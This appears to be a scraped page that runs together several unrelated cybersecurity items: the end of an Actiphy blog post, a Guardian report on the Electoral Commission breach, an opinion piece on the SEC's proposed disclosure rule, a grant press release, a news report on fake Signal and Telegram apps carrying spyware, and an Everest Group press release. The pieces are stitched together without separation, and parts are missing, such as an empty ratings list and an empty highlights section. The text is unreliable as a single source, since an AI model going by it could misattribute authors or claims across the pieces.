Concluding Thoughts

We live in an era where cybersecurity and data protection are converging rapidly...

A Brief Introduction
I am Richard Giddey, the Vice President for the Asia-Pacific region at Actiphy. With a history spanning more than two decades in storage, backup, and data protection, I've been involved in the APAC market through various roles, including co-founding the APAC division of StorageCraft and holding key positions at Exabyte Tape.

My Journey and Motivation for this Series
This blog series emanates from my passion for solving real-world data protection challenges and extensive experience in this field. It aims to provide actionable insights and clear guidance to navigate this complex area. I invite you to stay tuned for our next piece, "Modern Data Protection: What to Look for in 2023 and Beyond."


Electoral Commission failed cybersecurity test in same year as hack | Electoral Commission | The Guardian


The Electoral Commission has admitted it failed a cybersecurity test in the same year hackers successfully attacked the organisation.

The UK’s elections watchdog said it did not pass a Cyber Essentials test, a voluntary government-backed scheme that assesses an organisation’s readiness against cyber-attacks.

The commission said it failed the test in 2021, when it was breached by an unknown assailant.

The organisation revealed last month that it had been the subject of a “complex cyber-attack” that resulted in hackers accessing reference copies of the electoral registers, equating to the names and addresses of 40 million people. It said the attack started in August 2021 but was not detected until October 2022.

The commission said it did not pass the test due to two issues unrelated to the hack: an earlier version of Windows software on some laptops and a dated version of staff mobiles. It said those problems were not linked to the attack, which affected the organisation’s email servers.

“We are always working to improve our cybersecurity and systems. We draw on the expertise of the National Cyber Security Centre – as many public bodies do – to continue to develop and progress protections against cyber-threats. We regularly seek guidance and feedback on our systems to deal with the continued risk of cyber-threats as they evolve and take different forms. We welcome these learnings and act on them,” said an Electoral Commission spokesperson.

The Cyber Essentials website states that the scheme is important because vulnerability to basic attacks marks organisations out as targets for “more in-depth unwanted attention from cyber criminals and others”.

Proposed SEC Cybersecurity Rule Will Put Unnecessary Strain on CISOs

In March 2022, the Securities and Exchange Commission (SEC) proposed a rule on cybersecurity disclosure, governance, and risk management for public companies, known as the Proposed Rule for Public Companies (PRPC). This rule would require companies to report “material” cybersecurity incidents within four days. It would also require that boards of directors have cybersecurity expertise.

Unsurprisingly, it’s being met with all sorts of pushback. In its current form, the proposed rule leaves a lot of room for interpretation, and it’s impractical in some areas.

For one, the tight disclosure window will put massive amounts of pressure on chief information security officers (CISOs) to disclose material incidents before they have all the details. Incidents can take weeks and sometimes months to understand and fully remediate. It is impossible to know the impact of a new vulnerability until ample resources are dedicated to remediation. CISOs may also end up having to disclose vulnerabilities that, with more time, turn out to be less of an issue and therefore not material. That could, in turn, affect the short-term share price of a company.

Incidents Are a Living Thing — Not a One-and-Done Deal

Four-day disclosure requirements might sound fine at face value. But they are not realistic and will ultimately distract CISOs from putting out fires.

I’ll use the European Union’s General Data Protection Regulation (GDPR) as a comparison. Under the regulation, companies must report incidents of non-compliance within 72 hours. However, in the case of GDPR, the need to report is well-defined. While 72 hours is often too soon to know the specifics of an incident’s overall impact, organizations will at the very least know whether personal information has been compromised.

Compare this with the PRPC’s proposed disclosure requirements. Organizations will have an extra 24 hours, but — based on what’s been publicized thus far — they must determine internally whether the breach is material. Under GDPR, a company can do that based on the sensitivity of the data, its volume, and where it went. Under PRPC, “materiality” is defined by the SEC as anything that a “reasonable shareholder would consider important.” This could be virtually anything shareholders consider material to their business. It’s rather broad and not clearly defined.

Other Weak Definitions

Another issue is the proposal’s requirement to disclose circumstances in which a security incident was not material on its own but has become so “in aggregate.” How does this work in practice? Is an unpatched vulnerability from six months ago now in scope for disclosure (given that the company didn’t patch it) if it’s used to extend the scope of a subsequent incident? We already conflate threats, vulnerabilities, and business impact. A vulnerability that isn’t exploited isn’t material because it doesn’t create a business impact. What will you need to disclose when aggregate incidents need to be reported, and does the aggregation clause make this even harder to discern?

To make this more complicated, the proposed rule will require organizations to disclose any policy changes that resulted from previous incidents. How rigorously will this be measured and, honestly, why do it? Policies are supposed to be statements of intent — they’re not supposed to be low-level, forensic configuration guides. Updating a lower-level document (a standard) to mandate a specific encryption algorithm for sensitive data makes sense, but there are few higher-level docs that would be updated due to an incident. Examples might be requiring multifactor authentication or changing the patching service-level agreement (SLA) for in-scope critical vulnerabilities.

Lastly, the proposal says quarterly earnings reports will be the forum for disclosures. Personally, I don’t think quarterly earnings calls are the right forum to go deep on policy updates and security incidents. Who will give the updates? The CFO or CEO, who typically provides earnings reports, might not be sufficiently informed to give those critical reports. So, does the CISO now join the calls? And, if so, will they also respond to questions from financial analysts? It all seems impractical, but we’ll have to wait and see.

Questions About Board Experience

The first iteration of PRPC required disclosures about board oversight of cybersecurity risk management policies. This included disclosures about the individual board members and their respective cyber expertise. The SEC says it purposefully kept the definition broad, given the range in skill and experience particular to each board.

Luckily, after much scrutiny, the SEC decided to remove this requirement. PRPC does still call for companies to describe the board’s process for overseeing cybersecurity risks, and management’s role in handling those risks.

This will require some adjustments in communication and general awareness. Recently, Dr. Keri Pearlson, executive director of cybersecurity at MIT Sloan, and Lucia Milică, CISO at Stanley Black & Decker, surveyed 600 board members about activities surrounding cybersecurity. They found that “fewer than half (47%) of members serve on boards that interact with their CISOs regularly, and almost a third of them only see their CISOs at board presentations.” This clearly points to a communications gap.

The good news is most boards already have an audit and risk committee, which can serve as a subset of the board for this purpose. That said, it’s not uncommon for CISOs and CSOs to present matters involving cybersecurity that the rest of the board doesn’t fully understand. To close this gap, there needs to be greater alignment between the board and security executives.

Uncertainty Prevails

As with any new regulation, there are questions and uncertainties with PRPC. We’ll just have to wait and see how it all evolves and whether companies can meet the proposed requirements.

National Cybersecurity Alliance Receives 200K Grant From Craig Newmark Philanthropies for HBCU Cybersecurity Program

August 28, 2023- WASHINGTON – The National Cybersecurity Alliance (NCA) today announced it has received a significant boost in funding from Craig Newmark Philanthropies. The $200,000 grant will support ongoing initiatives within NCA’s Historically Black Colleges and Universities (HBCU) Cybersecurity Career, Mentoring, and Scholarship Program, as students return to school.

Launched in 2022, the ‘See Yourself In Cyber’ HBCU Career Program equips students with the necessary skills to navigate the search process for positions in security and builds a pipeline to black cybersecurity talent. The program provides HBCU students access to ongoing mentorship opportunities, on-campus career events featuring keynotes, panels and workshops, and a recently launched scholarship program to ensure equitable access and advancement within cybersecurity and tech careers.

“We extend our heartfelt appreciation to Craig Newmark Philanthropies for their generous support,” stated Lisa Plaggemier, Executive Director of the National Cybersecurity Alliance. “This funding will enable us to expand the ‘See Yourself in Cyber’ Program, empowering students from underrepresented backgrounds to break into and excel in the rapidly evolving cybersecurity sector.”

NCA will use the grant to bolster its 2023-2024 program with strategic investments in guest lecturers and curriculum development; student training, certification, and job placement; and developing real-world experiences via internship opportunities. In addition, a portion of the grant will be committed to producing virtual events, amplifying the program’s overall reach and impact.

“I am proud to support the National Cybersecurity Alliance in their mission to empower underrepresented students with the tools and opportunities to succeed in the cybersecurity field,” said Craig Newmark, founder of Craig Newmark Philanthropies and craigslist. “This program exemplifies the positive impact that education and mentorship can have on building a diverse and skilled workforce.”

In the last year, ‘See Yourself in Cyber’ has made remarkable strides toward fostering education, engagement, and mentorship for HBCU students. Through generous donations from organizations like Craig Newmark Philanthropies, the program will continue to expand its role in addressing the critical shortage of cybersecurity professionals while championing diversity and inclusivity.

To stay updated on the ‘See Yourself in Cyber’ HBCU Cybersecurity Career, Mentoring, and Scholarship Program and learn more about the National Cybersecurity Alliance, please visit NCA’s official website.

To learn more about our valued partners and how to become a sponsor, please visit NCA’s HBCU Cybersecurity Career Program webpage.

About National Cybersecurity Alliance

The National Cybersecurity Alliance is a non-profit organization on a mission to create a more secure, interconnected world. We advocate for the safe use of all technology and educate everyone on how best to protect ourselves, our families, and our organizations from cybercrime. We create strong partnerships between governments and corporations to amplify our message and to foster a greater “digital” good. National Cybersecurity Alliance’s core efforts include Cybersecurity Awareness Month (October); Data Privacy Day (Jan. 28); and CyberSecure My Business™, which offers webinars, web resources and workshops to help businesses be resistant to and resilient from cyberattacks. For more information, please visit https://staysafeonline.org.

About Craig Newmark Philanthropies

Craig Newmark is a Web pioneer, philanthropist, and leading advocate. Most commonly known for founding the online classified ads service craigslist, Newmark works to support and connect people and drive broad civic engagement. In 2016, he founded Craig Newmark Philanthropies to help and protect the people who protect our country. At its core, all of Newmark’s philanthropic work helps to strengthen American democracy by supporting the values that the country aspires to – fairness, opportunity, and respect. For more information, please visit: CraigNewmarkPhilanthropies.org. Craig can be found sharing his personal perspective on the issues of the day at @craignewmark.

Fake Signal and Telegram apps sneak malware into thousands of Android phones — delete these right now | Tom’s Guide

Hackers have developed a sneaky new tactic to push malware onto your phone and snoop on your conversations. Researchers at the cybersecurity firm ESET found fake apps in the Google and Samsung app stores, designed to steal user data, that posed as extensions or premium versions of the popular messaging platforms Signal and Telegram.

The malicious apps, called Signal Plus Messenger and FlyGram, could pull sensitive information from legitimate Signal and Telegram accounts, including call logs, SMS messages, locations and more, when users took certain actions.

Here’s how it works: Signal and Telegram enable users to link the mobile app to their other devices, such as their desktop or one of the best tablets. These malicious apps abuse this feature to silently link the compromised device’s account to a device controlled by the attacker, who can then read the victim’s communications while the user is none the wiser.

Google and Samsung have removed both apps from their respective app stores, but not before they racked up thousands of downloads. Signal Plus Messenger went live on the Play Store in July 2022 and was downloaded roughly 100 times before Google took it down in April in response to a tip from ESET, according to a report from The Hacker News. An app called FlyGram received 5,000 downloads after launching on the Play Store in June 2020 before its removal the next year. 

How to protect your Android phone

That this stealthy “auto-linking” capability has largely gone unnoticed until now is particularly concerning. If you have either Signal Plus Messenger or FlyGram installed on your Android phone, you should uninstall it immediately. To keep your phone safe moving forward, it’s important to download only the legitimate versions of Signal and Telegram, as well as to periodically check Settings > Linked Devices to make sure no unrecognized devices have appeared.

This campaign marks an unprecedented attempt to snoop on some of the most popular messaging apps in the world. Both malicious apps were built on open-source code available from Signal and Telegram. Within that code, hackers stealthily wove in the espionage tool tracked as BadBazaar, a Trojan used in previous attacks targeting Uyghurs and other Turkic ethnic minorities. ESET told the outlet it suspects the China-aligned hacking group known as GREF is behind the campaign.

“BadBazaar’s main purpose is to exfiltrate device information, the contact list, call logs, and the list of installed apps, and to conduct espionage on Signal messages by secretly linking the victim’s Signal Plus Messenger app to the attacker’s device,” security researcher Lukáš Štefanko said in an interview with The Hacker News.

In a statement to Forbes this week, Signal president Meredith Whittaker said the company was “deeply concerned for anyone who trusted and downloaded this app.” She praised Google for removing “this pernicious malware masquerading as Signal off their platform,” and urged Samsung to follow suit, which it has since.

Everest Group Research: C-Suite Must Recognize Critical Difference Between Cybersecurity and Cyber Resilience

DALLAS, Aug. 29, 2023 /PRNewswire-PRWeb/ — Everest Group is calling on enterprises to make the critical shift in focus from cybersecurity to cyber resilience. While cybersecurity focuses on safeguarding against threats, cyber resilience emphasizes the ability to withstand, respond to and recover quickly from them.

Everest Group issues this call to action in its recently published “State of the Market Report” on cybersecurity services. The report focuses on differentiating cybersecurity from cyber resilience, emphasizing that these two concepts are often mistakenly considered synonymous in the business world.

“Cybersecurity is just one component of cyber resilience, but, unfortunately, many enterprises fail to understand the subtle difference,” said Kumar Avijit, practice director of Information Technology Services at Everest Group. “While a majority of C-suite executives concentrate on preventive controls and response, equal importance needs to be allocated to the recovery, revamp, and reinforcement stages of cyber resilience. For any business, having a comprehensive cyber resilience strategy is critical in safeguarding long-term viability and success.”

Everest Group rates current C-suite focus on the “5 Rs of cyber resilience” as follows:

These findings and more are detailed in Everest Group’s recently published report, “Cybersecurity Services State of the Market Report 2023: Cyber Secure to Cyber Resilient.” Download a complimentary abstract here.

The report provides an in-depth analysis of the global cybersecurity market, with special sections on North America and Europe. In addition, the report introduces a unique and easily understandable framework to assist enterprises, particularly the C-suite, in swiftly incorporating cyber resilience into their operations. Additionally, the report explores the implications for providers in key areas such as solutions, services, partnerships, talent, and engagement models, illustrating how they can enable enterprises to adopt cyber resilience.

Selected Highlights:

About Everest Group 

Everest Group is a leading research firm helping business leaders make confident decisions. We guide clients through today’s market challenges and strengthen their strategies by applying contextualized problem-solving to their unique situations. This drives maximized operational and financial performance and transformative experiences. Our deep expertise and tenacious research, focused on technology, business processes, and engineering through the lenses of talent, sustainability, and sourcing, deliver precise and action-oriented guidance. Find further details and in-depth content at http://www.everestgrp.com.
